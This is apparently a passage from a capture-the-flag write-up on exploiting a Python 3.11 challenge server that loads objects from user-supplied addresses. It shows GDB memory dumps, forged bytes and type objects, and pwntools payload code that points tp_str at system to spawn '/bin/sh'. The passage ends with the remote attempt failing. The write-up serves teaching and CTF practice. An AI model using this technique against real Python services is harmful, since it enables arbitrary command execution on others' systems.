0x00007fc6f92ec000 0x00007fc6f92fd000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007fc6f92fd000 0x00007fc6f9303000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
...
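The arithmetic can be checked offline against the two runs shown above. This is only a sketch: the offset 5756904 was measured on my local build and will differ on any other binary, and python_base is a hypothetical helper that also verifies page alignment as a sanity check:

```python
ZERO_OFFSET = 5756904   # id(0) - base address, measured on the local build above

def python_base(zero_addr, offset=ZERO_OFFSET):
    """Compute the base address of the binary from the leaked id(0)."""
    base = zero_addr - offset
    # A correct base is page-aligned; anything else means the offset is wrong.
    if base % 0x1000 != 0:
        raise ValueError(f'suspicious base address: {hex(base)}')
    return base

print(hex(python_base(93824997988328)))   # run inside GDB (ASLR disabled)
print(hex(python_base(94128788563944)))   # run with ASLR enabled
```

Both results match the first line of the corresponding vmmap output.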
Leaking memory addresses
This part is not actually needed for the exploit, but it is interesting.
Let’s return for a moment to test.py and the bytes object:
$ gdb -q python3.11
Reading symbols from python3.11...
gef➤ run -i test.py
Starting program: /usr/local/bin/python3.11 -i test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Zero: 93824997988328
>>> x = bytes([1, 2, 3, 4, 5])
>>> id(x)
140737338006704
>>> load('140737338006704')
b'\x01\x02\x03\x04\x05'
gef➤ p *(PyBytesObject *) 140737338006704
$1 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0x5
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ x/30gx 140737338006704
0x7ffff709dcb0: 0x0000000000000001 0x00005555559cbac0
0x7ffff709dcc0: 0x0000000000000005 0xffffffffffffffff
0x7ffff709dcd0: 0x0000000504030201 0x0000000000000000
0x7ffff709dce0: 0x00007ffff709f870 0x00007ffff70aef10
0x7ffff709dcf0: 0x0000000000000001 0x00005555559e1c60
0x7ffff709dd00: 0x0000000000000001 0x0000555555b7e020
0x7ffff709dd10: 0x00007ffff709e460 0x00007ffff709dd40
0x7ffff709dd20: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd30: 0x0000000000000002 0x00007ffff726fe60
0x7ffff709dd40: 0x00007ffff709dd10 0x0000555555adfd78
0x7ffff709dd50: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd60: 0x0000000000000001 0x00007ffff7284260
0x7ffff709dd70: 0x00007ffff709dda0 0x00007ffff709dc80
0x7ffff709dd80: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd90: 0x0000000000000001 0x00007ffff7284260
As can be seen, the actual data appears at address 0x7ffff709dcd0 (0x0000000504030201). After that, we have a lot of memory addresses (from _ctypes). What if we modify the memory and set a bigger size?
gef➤ set *0x7ffff709dcc0 = 0xf0
gef➤ p *(PyBytesObject *) 140737338006704
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0xf0
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ continue
Continuing.
>>> load('140737338006704')
b'\x01\x02\x03\x04\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xf8\t\xf7\xff\x7f\x00\x00\x10\xef\n\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`\x1c\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \xe0\xb7UUU\x00\x00`\xe4\t\xf7\xff\x7f\x00\x00@\xdd\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00`\xfe&\xf7\xff\x7f\x00\x00\x10\xdd\t\xf7\xff\x7f\x00\x00x\xfd\xadUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`B(\xf7\xff\x7f\x00\x00\xa0\xdd\t\xf7\xff\x7f\x00\x00\x80\xdc\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`B(\xf7\xff\x7f\x00\x00P\xdf\t\xf7\xff\x7f\x00\x00p\xdd\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00'
Incredible, isn’t it? Now we must figure out if we are able to get this read primitive in the program.
Let’s try to add a long string:
>>> add('AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHH')
140737339460016
gef➤ x/30gx 140737339460016
0x7ffff72009b0: 0x0000000000000001 0x00005555559e51a0
0x7ffff72009c0: 0x0000000000000040 0x7fedcbdbbb64ace9
0x7ffff72009d0: 0x0000555555adb4e5 0x0000000000000000
0x7ffff72009e0: 0x4141414141414141 0x4242424242424242
0x7ffff72009f0: 0x4343434343434343 0x4444444444444444
0x7ffff7200a00: 0x4545454545454545 0x4646464646464646
0x7ffff7200a10: 0x4747474747474747 0x4848484848484848
0x7ffff7200a20: 0x0a29274848484800 0x0000000000000000
0x7ffff7200a30: 0x0000000000000001 0x0000000000010303
0x7ffff7200a40: 0x0000000000000004 0x0000000000000001
0x7ffff7200a50: 0xffffffff00ffffff 0x0000555555ada9a0
0x7ffff7200a60: 0x00007ffff709abb0 0x0000000000000000
0x7ffff7200a70: 0x0000000000000000 0x0000000000000000
0x7ffff7200a80: 0x0000000000000000 0x0000000000000000
0x7ffff7200a90: 0x0000000000000000 0x0000000000000000
Can you guess the next step? We are going to enter a fake object in the str buffer, and tell the program to load it with PyObj_FromPtr. Let’s keep the previous bytes object in mind:
gef➤ x/10gx 140737338006704
0x7ffff709dcb0: 0x0000000000000001 0x00005555559cbac0
0x7ffff709dcc0: 0x0000000000000005 0xffffffffffffffff
0x7ffff709dcd0: 0x0000000504030201 0x0000000000000000
0x7ffff709dce0: 0x00007ffff709f870 0x00007ffff70aef10
Now let’s add a fake bytes object in storage:
>>> add('\x01\0\0\0\0\0\0\0\xc0\xba\x9c\x55\x55\x55\0\0\xf0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff')
140737338229456
>>> load('140737338229456')
ÀºUUUðÿÿÿÿÿÿÿÿ
And we have this in memory:
gef➤ x/30gx 140737338229456
0x7ffff70d42d0: 0x0000000000000001 0x00005555559e51a0
0x7ffff70d42e0: 0x0000000000000020 0xa6753be1cbf2463d
0x7ffff70d42f0: 0x00640053006400a4 0x0000000000000000
0x7ffff70d4300: 0x0000000000000000 0x0000000000000000
0x7ffff70d4310: 0x0000000000000000 0x0000000000000001
0x7ffff70d4320: 0x00005555559cbac0 0x00000000000000f0
0x7ffff70d4330: 0xffffffffffffffff 0x0000000079702e00
0x7ffff70d4340: 0x00007ffff70d43b0 0x0000000000000000
0x7ffff70d4350: 0x0000000000000000 0x00005555559d2ea0
0x7ffff70d4360: 0x0000000000000000 0x0000000000000000
0x7ffff70d4370: 0x0000000000000000 0x0000000000000000
0x7ffff70d4380: 0x0000000000000000 0x0000000000000000
0x7ffff70d4390: 0x0000000000000000 0x0000000000000000
0x7ffff70d43a0: 0x0000000000000000 0x0000000000000000
0x7ffff70d43b0: 0x00007ffff70d4420 0x00005555559e51a0
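Notice that the fake bytes object appears at offset 0x48 instead of 0x30. The string contains non-ASCII characters, so it is stored as a PyCompactUnicodeObject, whose header is 0x18 bytes longer than the one of PyASCIIObject: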
gef➤ x/10gx 140737338229456 + 0x48
0x7ffff70d4318: 0x0000000000000001 0x00005555559cbac0
0x7ffff70d4328: 0x00000000000000f0 0xffffffffffffffff
0x7ffff70d4338: 0x0000000079702e00 0x00007ffff70d43b0
0x7ffff70d4348: 0x0000000000000000 0x0000000000000000
0x7ffff70d4358: 0x00005555559d2ea0 0x0000000000000000
gef➤ p *(PyBytesObject *) (140737338229456 + 0x48)
$3 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0xf0
},
ob_shash = 0xffffffffffffffff,
ob_sval = ""
}
And we can actually load it in the program:
>>> load(str(140737338229456 + 0x48))
b"\x00.py\x00\x00\x00\x00\xb0C\r\xf7\xff\x7f\x00\x00\xc0\xba\x9cUUU\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xf0\x03\x01\x01\x01\xd8\x00\x04\x80\x04\x80S\x80S\xd0\t\x1f\xd1\x05 \xd4\x05 \xd1\x00!\xd4\x00!\xd0\x00!\xd0\x00!\xd0\x00!\xc3\xbf\xc3\xbf\xc3\xbf\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 D\r\xf7\xff\x7f\x00\x00\xa0Q\x9eUUU\x00\x004\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'ModuleSpec' object has no attribute '_initializing'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
As I said, this can be useful to leak memory addresses from _ctypes, but they are not actually needed.
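The fake bytes header that was typed by hand above can also be generated, which is less error-prone. A possible sketch with struct, assuming a 64-bit little-endian target; fake_bytes_header is a made-up helper, and 0x5555559cbac0 is the address of PyBytes_Type in the GDB session (it changes with ASLR):

```python
import struct

def fake_bytes_header(type_addr, size, refcnt=1):
    """Pack ob_refcnt, ob_type, ob_size and ob_shash (-1 means not cached yet)."""
    return struct.pack('<qQqq', refcnt, type_addr, size, -1)

header = fake_bytes_header(0x5555559cbac0, 0xf0)

# The string entered in the REPL before, for comparison
typed = ('\x01\0\0\0\0\0\0\0\xc0\xba\x9c\x55\x55\x55\0\0'
         '\xf0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff')
print(len(header), header == typed.encode('latin-1'))
```

The latin-1 encoding maps every character to the byte with the same value, so the comparison is done on the exact bytes that end up in memory.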
Fake object primitive
The previous function was not useful for exploitation, but it showed us how to craft fake objects in memory and make Python load them. To get code execution, we need to hijack a function pointer. One approach is to craft a fake PyTypeObject whose slot for a “magic/dunder” method points to a function of our choice (as shown in the article).
Here we must take into account that print(PyObj_FromPtr(int(addr))) needs a string representation of the object, so it ends up calling PyObj_FromPtr(int(addr)).__str__() or PyObj_FromPtr(int(addr)).__repr__(). Therefore, the idea is to enter a fake PyObject with a fake PyTypeObject that has a malicious function (for instance, system) at the offset for __repr__ or __str__.
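Which of the two methods print reaches first can be checked in pure Python. A small sketch (the class Probe exists only for this test):

```python
import contextlib
import io

class Probe:
    def __repr__(self) -> str:
        return 'repr slot'

    def __str__(self) -> str:
        return 'str slot'

# Capture what print() writes so the result can be inspected
buffer = io.StringIO()
with contextlib.redirect_stdout(buffer):
    print(Probe())

printed = buffer.getvalue().strip()
print(printed)  # str slot
```

A class that defines only __repr__ is printed through __repr__ instead, so filling both slots of the fake type is the safe choice.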
Since we already bypassed PIE, we can call system through the Procedure Linkage Table (PLT), so that is not a problem (I used pwntools to get the exact address).
The following code is similar to the one showcased in the article (available here):
python = ELF('/usr/local/bin/python3.11')
python.address = python_base_addr
type_obj = sp64(0xacdc1337) + b'X' * 0x48 + sp64(python.plt.system) * 100
fake_type_obj_addr = add(p, type_obj)
fake_obj_addr = add(p, sp64(0x11) + sp64(fake_type_obj_addr + 0x48))
p.interactive()
The function sp64 packs a number into 8 bytes and re-encodes them as UTF-8 text. Since the program reads its input with input, which decodes UTF-8, non-ASCII bytes like \x80 or \xff must be sent as \xc2\x80 and \xc3\xbf:
$ python3 -q
>>> '\x80'.encode()
b'\xc2\x80'
>>> '\xff'.encode()
b'\xc3\xbf'
So this is the function, very simple:
def sp64(num: int) -> bytes:
    return ''.join(chr(b) for b in p64(num)).encode()
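The round trip can be reproduced without pwntools. In this sketch struct.pack stands in for p64, and as_stored is a hypothetical helper that models what ends up in memory, assuming CPython keeps one byte per character for strings whose code points are all below 0x100:

```python
import struct

def sp64(num: int) -> bytes:
    """Same idea as the function above, with struct.pack standing in for pwntools' p64."""
    return ''.join(chr(b) for b in struct.pack('<Q', num)).encode()

def as_stored(wire: bytes) -> bytes:
    """Bytes of the decoded text when every character fits in a single byte."""
    return wire.decode().encode('latin-1')

wire = sp64(0xacdc1337)
print(wire.hex())             # 3713c39cc2ac00000000
print(as_stored(wire).hex())  # 3713dcac00000000
```

The first line is what travels over the socket (two bytes for each non-ASCII value), the second is the original 8-byte little-endian number. A value containing the byte 0x0a would still cut the payload short, since input stops at the newline.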
And we have this output:
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11' argv=[b'python3.11', b'challenge/server.py'] : pid 850847
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/usr/local/bin/python3.11', '850847', '-x', '/tmp/pwnlxyiopha.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x54 bytes:
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x55f82e0447e8
[+] Python base address: 0x55f82dac7000
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[DEBUG] Sent 0x2 bytes:
b'0\n'
[DEBUG] Received 0x7 bytes:
b'To Add:'
[DEBUG] Sent 0x49f bytes:
00000000 37 13 c3 9c c2 ac 00 00 00 00 58 58 58 58 58 58 │7···│····│··XX│XXXX│
00000010 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 │XXXX│XXXX│XXXX│XXXX│
*
00000050 58 58 c2 94 5a c2 bb 2d c3 b8 55 00 00 c2 94 5a │XX··│Z··-│··U·│···Z│
00000060 c2 bb 2d c3 b8 55 00 00 c2 94 5a c2 bb 2d c3 b8 │··-·│·U··│··Z·│·-··│
...
00000430 c2 94 5a c2 bb 2d c3 b8 55 00 00 c2 94 5a c2 bb │··Z·│·-··│U···│·Z··│
00000440 2d c3 b8 55 00 00 c2 94 5a c2 bb 2d c3 b8 55 00 │-··U│····│Z··-│··U·│
[DEBUG] Received 0x63 bytes:
b'94524420584272\n'
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[DEBUG] Sent 0x2 bytes:
b'0\n'
[DEBUG] Received 0x7 bytes:
b'To Add:'
[DEBUG] Sent 0x15 bytes:
00000000 11 00 00 00 00 00 00 00 c2 98 c3 b3 c2 82 2e c3 │····│····│····│··.·│
00000010 b8 55 00 00 0a │·U··│·│
00000015
[DEBUG] Received 0x64 bytes:
b'140671526391504\n'
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] Switching to interactive mode
Zero: 94524412282856
0) Add To Store
1) Remove From Store
2) Load Address
Selection:$
And these are the allocated objects with the fake objects inside:
gef➤ x/30gx 94524420584272
0x55f82e82f350: 0x0000000000000001 0x000055f82df581a0
0x55f82e82f360: 0x0000000000000370 0xffffffffffffffff
0x55f82e82f370: 0x0000001a000000a4 0x0000000000000000
0x55f82e82f380: 0x0000000000000000 0x0000000000000000
0x55f82e82f390: 0x0000000000000000 0x00000000acdc1337
0x55f82e82f3a0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3b0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3c0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3d0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3e0: 0x5858585858585858 0x000055f82dbb5a94
0x55f82e82f3f0: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f400: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f410: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f420: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f430: 0x000055f82dbb5a94 0x000055f82dbb5a94
gef➤ x/30gx 140671526391504
0x7ff0a45c4ed0: 0x0000000000000001 0x000055f82df581a0
0x7ff0a45c4ee0: 0x0000000000000010 0xffffffffffffffff
0x7ff0a45c4ef0: 0x00000000000000a4 0x0000000000000000
0x7ff0a45c4f00: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f10: 0x0000000000000000 0x0000000000000011
0x7ff0a45c4f20: 0x000055f82e82f398 0x0000000000000000
0x7ff0a45c4f30: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f40: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f50: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f60: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f70: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f80: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f90: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4fa0: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4fb0: 0x0000000000000000 0x0000000000000000
gef➤ p *(PyObject *) (140671526391504 + 0x48)
$1 = {
ob_refcnt = 0x11,
ob_type = 0x55f82e82f398
}
gef➤ p *(PyTypeObject *) 0x55f82e82f398
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0xacdc1337,
ob_type = 0x5858585858585858
},
ob_size = 0x5858585858585858
},
tp_name = 0x5858585858585858 <error: Cannot access memory at address 0x5858585858585858>,
tp_basicsize = 0x5858585858585858,
tp_itemsize = 0x5858585858585858,
tp_dealloc = 0x5858585858585858,
tp_vectorcall_offset = 0x5858585858585858,
tp_getattr = 0x5858585858585858,
tp_setattr = 0x5858585858585858,
tp_as_async = 0x55f82dbb5a94 <system@plt+4>,
tp_repr = 0x55f82dbb5a94 <system@plt+4>,
tp_as_number = 0x55f82dbb5a94 <system@plt+4>,
tp_as_sequence = 0x55f82dbb5a94 <system@plt+4>,
tp_as_mapping = 0x55f82dbb5a94 <system@plt+4>,
tp_hash = 0x55f82dbb5a94 <system@plt+4>,
tp_call = 0x55f82dbb5a94 <system@plt+4>,
tp_str = 0x55f82dbb5a94 <system@plt+4>,
tp_getattro = 0x55f82dbb5a94 <system@plt+4>,
tp_setattro = 0x55f82dbb5a94 <system@plt+4>,
tp_as_buffer = 0x55f82dbb5a94 <system@plt+4>,
tp_flags = 0x55f82dbb5a94,
tp_doc = 0x55f82dbb5a94 <system@plt+4> "\362\377%-l8",
tp_traverse = 0x55f82dbb5a94 <system@plt+4>,
tp_clear = 0x55f82dbb5a94 <system@plt+4>,
tp_richcompare = 0x55f82dbb5a94 <system@plt+4>,
tp_weaklistoffset = 0x55f82dbb5a94,
tp_iter = 0x55f82dbb5a94 <system@plt+4>,
tp_iternext = 0x55f82dbb5a94 <system@plt+4>,
tp_methods = 0x55f82dbb5a94 <system@plt+4>,
tp_members = 0x55f82dbb5a94 <system@plt+4>,
tp_getset = 0x55f82dbb5a94 <system@plt+4>,
tp_base = 0x55f82dbb5a94 <system@plt+4>,
tp_dict = 0x55f82dbb5a94 <system@plt+4>,
tp_descr_get = 0x55f82dbb5a94 <system@plt+4>,
tp_descr_set = 0x55f82dbb5a94 <system@plt+4>,
tp_dictoffset = 0x55f82dbb5a94,
tp_init = 0x55f82dbb5a94 <system@plt+4>,
tp_alloc = 0x55f82dbb5a94 <system@plt+4>,
tp_new = 0x55f82dbb5a94 <system@plt+4>,
tp_free = 0x55f82dbb5a94 <system@plt+4>,
tp_is_gc = 0x55f82dbb5a94 <system@plt+4>,
tp_bases = 0x55f82dbb5a94 <system@plt+4>,
tp_mro = 0x55f82dbb5a94 <system@plt+4>,
tp_cache = 0x55f82dbb5a94 <system@plt+4>,
tp_subclasses = 0x55f82dbb5a94 <system@plt+4>,
tp_weaklist = 0x55f82dbb5a94 <system@plt+4>,
tp_del = 0x55f82dbb5a94 <system@plt+4>,
tp_version_tag = 0x2dbb5a94,
tp_finalize = 0x55f82dbb5a94 <system@plt+4>,
tp_vectorcall = 0x55f82dbb5a94 <system@plt+4>
}
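The field offsets in this dump can be cross-checked with ctypes. The TypeHeader class below is only an illustration: it mirrors the field order printed by GDB up to tp_str and is not read from the interpreter.

```python
import ctypes

class TypeHeader(ctypes.Structure):
    """Leading fields of PyTypeObject, in the order GDB printed them above."""
    _fields_ = [
        ('ob_refcnt', ctypes.c_ssize_t),
        ('ob_type', ctypes.c_void_p),
        ('ob_size', ctypes.c_ssize_t),
        ('tp_name', ctypes.c_char_p),
        ('tp_basicsize', ctypes.c_ssize_t),
        ('tp_itemsize', ctypes.c_ssize_t),
        ('tp_dealloc', ctypes.c_void_p),
        ('tp_vectorcall_offset', ctypes.c_ssize_t),
        ('tp_getattr', ctypes.c_void_p),
        ('tp_setattr', ctypes.c_void_p),
        ('tp_as_async', ctypes.c_void_p),
        ('tp_repr', ctypes.c_void_p),
        ('tp_as_number', ctypes.c_void_p),
        ('tp_as_sequence', ctypes.c_void_p),
        ('tp_as_mapping', ctypes.c_void_p),
        ('tp_hash', ctypes.c_void_p),
        ('tp_call', ctypes.c_void_p),
        ('tp_str', ctypes.c_void_p),
    ]

for name in ('tp_as_async', 'tp_repr', 'tp_str'):
    print(name, hex(getattr(TypeHeader, name).offset))
```

On a 64-bit build this should print 0x50, 0x58 and 0x88, so a spray of system addresses that starts at offset 0x50 of the fake type covers both tp_repr and tp_str.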
As can be seen, the fake type object has tp_repr and tp_str pointing to system. Let’s add a breakpoint and trigger it:
gef➤ break system
Breakpoint 1 at 0x7ff0a5049290: file ../sysdeps/posix/system.c, line 198.
gef➤ p/d (140671526391504 + 0x48)
$3 = 140671526391576
gef➤ continue
Continuing.
Selection:$ 2
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x8 bytes:
b'To Load:'
To Load:$ 140671526391576
[DEBUG] Sent 0x10 bytes:
b'140671526391576\n'
$
gef➤ x/i $rip
=> 0x7ff0a5049290 <__libc_system>: endbr64
gef➤ backtrace
#0 __libc_system (line=0x7ff0a45c4f18 "\023") at ../sysdeps/posix/system.c:198
#1 0x000055f82dc79d77 in PyObject_Str (v=0x7ff0a45c4f18) at ./Include/object.h:133
#2 PyObject_Str (v=0x7ff0a45c4f18) at Objects/object.c:455
#3 0x000055f82dc3a9b5 in PyFile_WriteObject (v=0x7ff0a45c4f18, f=f@entry=0x7ff0a472bed0, flags=flags@entry=0x1) at Objects/fileobject.c:129
#4 0x000055f82dd2fef2 in builtin_print_impl (module=<optimized out>, flush=0x0, file=0x7ff0a472bed0, end=<optimized out>, sep=<optimized out>, args=0x7ff0a4716b90) at Python/bltinmodule.c:2039
#5 builtin_print (module=<optimized out>, args=<optimized out>, nargs=<optimized out>, kwnames=<optimized out>) at Python/clinic/bltinmodule.c.h:838
#6 0x000055f82dc76877 in cfunction_vectorcall_FASTCALL_KEYWORDS (func=0x7ff0a4795670, args=0x7ff0a5378078, nargsf=<optimized out>, kwnames=<optimized out>) at ./Include/cpython/methodobject.h:52
#7 0x000055f82dc1bbbf in _PyObject_VectorcallTstate (kwnames=0x55f82ddc8fba <PyErr_CheckSignals+26>, nargsf=<optimized out>, args=0x7ff0a5378078, callable=0x7ff0a4795670, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at ./Include/internal/pycore_call.h:92
#8 PyObject_Vectorcall (callable=callable@entry=0x7ff0a4795670, args=args@entry=0x7ff0a5378078, nargsf=<optimized out>, kwnames=kwnames@entry=0x0) at Objects/call.c:299
#9 0x000055f82dbbb22f in _PyEval_EvalFrameDefault (tstate=<optimized out>, frame=<optimized out>, throwflag=<optimized out>) at Python/ceval.c:7314
#10 0x000055f82dd353b5 in _PyEval_EvalFrame (throwflag=0x0, frame=0x7ff0a5378020, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at ./Include/internal/pycore_ceval.h:73
#11 _PyEval_Vector (args=0x0, argcount=0x0, kwnames=0x0, locals=0x7ff0a4802a80, func=0x7ff0a47ddf80, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at Python/ceval.c:6438
#12 PyEval_EvalCode (co=co@entry=0x55f82e836f40, globals=globals@entry=0x7ff0a4802a80, locals=locals@entry=0x7ff0a4802a80) at Python/ceval.c:1154
#13 0x000055f82dd859a7 in run_eval_code_obj (locals=0x7ff0a4802a80, globals=0x7ff0a4802a80, co=0x55f82e836f40, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at Python/pythonrun.c:1714
#14 run_mod (mod=<optimized out>, filename=filename@entry=0x7ff0a47a23b0, globals=globals@entry=0x7ff0a4802a80, locals=locals@entry=0x7ff0a4802a80, flags=flags@entry=0x7ffcbbcb58e8, arena=arena@entry=0x7ff0a47277b0) at Python/pythonrun.c:1735
#15 0x000055f82dd87102 in pyrun_file (flags=0x7ffcbbcb58e8, closeit=0x1, locals=0x7ff0a4802a80, globals=0x7ff0a4802a80, start=0x101, filename=0x7ff0a47a23b0, fp=0x55f82e7ea230) at Python/pythonrun.c:1630
#16 _PyRun_SimpleFileObject (fp=fp@entry=0x55f82e7ea230, filename=filename@entry=0x7ff0a47a23b0, closeit=closeit@entry=0x1, flags=flags@entry=0x7ffcbbcb58e8) at Python/pythonrun.c:440
#17 0x000055f82dd8768f in _PyRun_AnyFileObject (fp=0x55f82e7ea230, filename=filename@entry=0x7ff0a47a23b0, closeit=closeit@entry=0x1, flags=flags@entry=0x7ffcbbcb58e8) at Python/pythonrun.c:79
#18 0x000055f82ddaa28b in pymain_run_file_obj (skip_source_first_line=0x0, filename=0x7ff0a47a23b0, program_name=0x7ff0a4802c70) at Modules/main.c:360
#19 pymain_run_file (config=0x55f82e052ea0 <_PyRuntime+59904>) at Modules/main.c:379
#20 pymain_run_python (exitcode=exitcode@entry=0x7ffcbbcb5a40) at Modules/main.c:601
#21 0x000055f82ddaa97f in Py_RunMain () at Modules/main.c:680
#22 pymain_main (args=0x7ffcbbcb5a00) at Modules/main.c:710
#23 Py_BytesMain (argc=<optimized out>, argv=<optimized out>) at Modules/main.c:734
#24 0x00007ff0a501b083 in __libc_start_main (main=0x55f82dbb6dd0 <main>, argc=0x2, argv=0x7ffcbbcb5b68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffcbbcb5b58) at ../csu/libc-start.c:308
#25 0x000055f82dbc38de in _start () at Objects/object.c:1301
We have executed system. Actually, the backtrace shows that it was called from PyObject_Str, so through the __str__ slot (tp_str) and not __repr__. Either way, we are close to exploiting this program. Observe that we have some control over $rdi, which points to our fake object:
gef➤ x/s $rdi
0x7ff0a45c4f18: "\023"
gef➤ x/gx $rdi
0x7ff0a45c4f18: 0x0000000000000013
Notice that we set 0x11 as refcnt in the fake PyObject, and now we are seeing 0x13. This field is increased/decreased by the Python interpreter according to the number of references to the object, and by the time system runs it has been incremented twice. Therefore, we can store "/bin/sh\0" as a little-endian 64-bit integer minus 2 in that field. If you don’t believe it, just hit continue on the debugger:
[DEBUG] Received 0x14 bytes:
00000000 73 68 3a 20 31 3a 20 13 3a 20 6e 6f 74 20 66 6f │sh: │1: ·│: no│t fo│
00000010 75 6e 64 0a │und·│
00000014
sh: 1: \x13: not found
$
So, we must update the last part of the exploit:
fake_type_obj_addr = add(p, type_obj)
fake_obj_addr = add(p, sp64(u64(b'/bin/sh\0') - 2) + sp64(fake_type_obj_addr + 0x48))
load(p, fake_obj_addr + 0x48, do_recv=False)
p.interactive()
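The arithmetic behind u64(b'/bin/sh\0') - 2 can be checked with the standard library alone. In this sketch command_as_refcnt is a hypothetical helper, and the default of 2 increments is simply what was observed in the debugging session above (0x11 became 0x13), not a general rule:

```python
import struct

def command_as_refcnt(command: bytes, pending_increfs: int = 2) -> int:
    """Value to store in ob_refcnt so that it reads as `command` after the increments."""
    if len(command) != 8:
        raise ValueError('command must be exactly 8 bytes, NUL terminator included')
    (value,) = struct.unpack('<Q', command)
    return value - pending_increfs

refcnt = command_as_refcnt(b'/bin/sh\0')
print(struct.pack('<Q', refcnt))      # b'-bin/sh\x00'
print(struct.pack('<Q', refcnt + 2))  # b'/bin/sh\x00'
```

Only the lowest byte changes: the payload is stored as "-bin/sh" and turns into "/bin/sh" once the interpreter has bumped the reference count twice.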
Let’s disable GDB and debug mode… And we have a shell:
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11': pid 862795
[*] id(0) = 0x56148b0867e8
[+] Python base address: 0x56148ab09000
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] Switching to interactive mode
$ ls
build_docker.sh challenge Dockerfile solve.py test.py
Let’s try with the Docker container:
$ python3 solve.py 127.0.0.1:1337
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] id(0) = 0x7f33f7ce9288
[+] Python base address: 0x7f33f776baa0
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
Ouch… It does not succeed… Probably because our local Python build differs from the one in the container (ours has debugging symbols, for instance): the computed base address is not even page-aligned.
